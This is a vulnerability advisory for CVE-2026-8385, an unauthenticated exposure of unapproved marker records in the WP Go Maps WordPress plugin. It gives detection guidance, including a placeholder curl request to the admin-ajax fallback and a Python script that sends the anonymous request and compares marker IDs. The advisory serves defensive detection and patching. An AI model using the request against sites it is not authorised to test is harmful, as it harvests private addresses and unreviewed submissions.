CVE-2026-8385
WP Go Maps Marker Data Exposure via Unauthenticated AJAX Request

Publication date: 2026-06-15

Last updated on: 2026-06-15

Assigner: WPScan

Description
The WP Go Maps WordPress plugin before 10.0.10 does not properly enforce the marker approval filter on the admin-ajax fallback for its datatables route, allowing unauthenticated visitors to retrieve marker records that the site owner has not approved for public display, including their title, category, address and description fields.
Affected Vendors & Products
Vendor: wp_go_maps
Product: wp_go_maps
Version / Range: < 10.0.10 (10.0.10 itself is fixed and excluded)
CWE ID: CWE-UNKNOWN
Executive Summary

CVE-2026-8385 affects the WP Go Maps plugin for WordPress in plugin versions before 10.0.10. The plugin exposes its datatables route through two paths, and the admin-ajax fallback does not enforce the marker approval filter.

An unauthenticated visitor can therefore retrieve marker records that the site owner has not approved for public display, including each marker's title, category, address and description fields.

The primary (REST) route applies the approval filter; only the admin-ajax fallback skips it. The access control therefore depends on which of two equivalent paths a client chooses to call, and an attacker simply picks the one without the check.

Impact Analysis

The vulnerability discloses location data held by WP Go Maps that was deliberately withheld from the public map: markers not approved for display are not rendered on the site, yet their title, category, address and description can be pulled directly from the fallback endpoint by anyone.

Because no account is needed, the records can be harvested at scale with a single unauthenticated request per page of results.

Unapproved markers are precisely the records a site owner chose not to publish, so they are the ones most likely to hold private addresses or unreviewed submissions. Their exposure can harm the privacy of individuals or organisations, damage reputation, and give an attacker material for further targeting or social engineering.

Detection Guidance

The check is a differential one: marker data requested through the plugin's admin-ajax fallback as an anonymous client should contain nothing beyond what the approved, publicly rendered map already shows. Run it only against sites you own or are authorised to test.

  • First read the installed plugin version; anything below 10.0.10 is in the affected range. Version evidence alone is sufficient for a finding and avoids pulling other people's data.
  • Send the datatables fallback request to /wp-admin/admin-ajax.php as an anonymous client: a fresh curl invocation with no cookies and no nonce. The action name and DataTables parameters must be copied from the plugin's own front-end JavaScript; the advisory does not name them, and guessing a generic action name exercises a different handler.
  • Example shape: curl -s -X POST 'https://example.com/wp-admin/admin-ajax.php' --data 'action=<plugin datatables action>&<datatables parameters>' (replace the placeholders with the values the plugin's map page actually submits).
  • Compare the marker ids in the response with the set visible on the public map or through the primary route, or with the approval state shown in the admin UI.

If the anonymous response contains any marker that is not approved for public display, the site is vulnerable. A fallback that returns only the approved markers matches the intended behaviour, with the approval filter enforced on both paths.
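The comparison step above, written out as an added example; this is not code from the page or from the WP Go Maps project. It assumes (none of these names come from the advisory) that both the primary route and the admin-ajax fallback answer with DataTables-style JSON carrying a top-level "data" list of marker rows, that each row has an integer "id", and that the sensitive fields use the names the advisory lists. The AJAX action and request parameters are left as placeholders to be taken from the plugin's own JavaScript, and the sample responses are constructed, not captured from any site.

```python
"""
Differential check for an admin-ajax datatables fallback that skips an
approval filter. Added example, not part of the advisory or the plugin.

Assumptions (not from the advisory):
  - both routes return DataTables-style JSON: {"data": [ {row}, ... ]}
  - each row has an integer "id" plus title/category/address/description
  - the action name and DataTables parameters are placeholders
"""
import json
import urllib.parse
import urllib.request

ADMIN_AJAX = "https://example.com/wp-admin/admin-ajax.php"   # assumed target
AJAX_PARAMS = {                                                # placeholders
    "action": "<plugin datatables action>",
    "draw": "1", "start": "0", "length": "1000",
}


def fetch_fallback_unauthenticated(url=ADMIN_AJAX, params=AJAX_PARAMS, timeout=10):
    """POST the fallback call with no cookies and no nonce, i.e. exactly what
    an anonymous visitor sends. Returns the parsed JSON body (network access)."""
    body = urllib.parse.urlencode(params).encode()
    req = urllib.request.Request(
        url, data=body, method="POST",
        headers={"Content-Type": "application/x-www-form-urlencoded"})
    with urllib.request.urlopen(req, timeout=timeout) as resp:  # no cookie jar
        return json.loads(resp.read().decode("utf-8", "replace"))


def marker_rows(payload):
    """Pull marker rows out of a DataTables-style payload. Tolerates a missing
    data list, a non-dict payload, and rows that are lists rather than dicts."""
    rows = payload.get("data", []) if isinstance(payload, dict) else []
    return [r for r in rows if isinstance(r, dict) and "id" in r]


def unapproved_markers(fallback_payload, approved_ids):
    """Rows the fallback exposed whose id is not in the approved set (the ids
    the primary route shows, or an export from the admin UI). A non-empty
    result means the approval filter was not enforced on the fallback."""
    approved = {int(i) for i in approved_ids}
    return [r for r in marker_rows(fallback_payload) if int(r["id"]) not in approved]


def leaked_fields(rows, fields=("title", "category", "address", "description")):
    """Which of the advisory's sensitive fields are actually populated in the leaked rows."""
    return sorted({f for r in rows for f in fields if r.get(f)})


# Constructed sample responses (not captured from any real site). The primary
# route shows two approved markers; the fallback also returns an unapproved
# third marker together with its address and description.
SAMPLE_PUBLIC = {"data": [
    {"id": 1, "title": "Shop", "address": "1 High St"},
    {"id": 2, "title": "Office", "address": "2 Main Rd"},
]}
SAMPLE_FALLBACK = {"data": [
    {"id": 1, "title": "Shop", "category": "Retail", "address": "1 High St", "description": ""},
    {"id": 2, "title": "Office", "category": "HQ", "address": "2 Main Rd", "description": ""},
    {"id": 7, "title": "Pending", "category": "Customer",
     "address": "14 Private Lane", "description": "not yet reviewed"},
]}


def demo():
    """Run the offline comparison on the constructed samples."""
    approved = {r["id"] for r in marker_rows(SAMPLE_PUBLIC)}
    leaked = unapproved_markers(SAMPLE_FALLBACK, approved)
    return {"leaked_ids": [r["id"] for r in leaked], "fields": leaked_fields(leaked)}


if __name__ == "__main__":
    # Against a live target, replace the samples with
    # fetch_fallback_unauthenticated() and the ids from the primary route.
    print(demo())  # {'leaked_ids': [7], 'fields': ['address', 'category', 'description', 'title']}
```

The approved set is the trust anchor here: derive it from the route or UI that the site owner controls, never from the fallback response itself, otherwise the comparison proves nothing.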

Mitigation Strategies

Update WP Go Maps to version 10.0.10 or later, where the fallback enforces the approval filter, and confirm afterwards that the installed version really is 10.0.10 or above.

If the update must wait, do not block /wp-admin/admin-ajax.php wholesale: WordPress core, themes and many plugins rely on it for logged-out visitors, so a blanket deny breaks unrelated functionality. Restrict only the plugin's datatables fallback, for example by denying unauthenticated requests whose action parameter matches that handler at the web server or WAF, or by unhooking the handler's wp_ajax_nopriv_ registration from a must-use plugin. In the meantime, treat unapproved markers as already exposed and review what they contain.

Compliance Impact

The vulnerability allows unauthenticated visitors to access marker records that have not been approved for public display, including potentially sensitive information such as titles, categories, addresses, and descriptions.

This unauthorized data exposure could lead to non-compliance with data protection regulations like GDPR or HIPAA, which require proper access controls and protection of personal or sensitive information.

Since the plugin fails to enforce marker approval filters properly, it risks exposing data that should be restricted, potentially violating privacy and security requirements mandated by these standards.
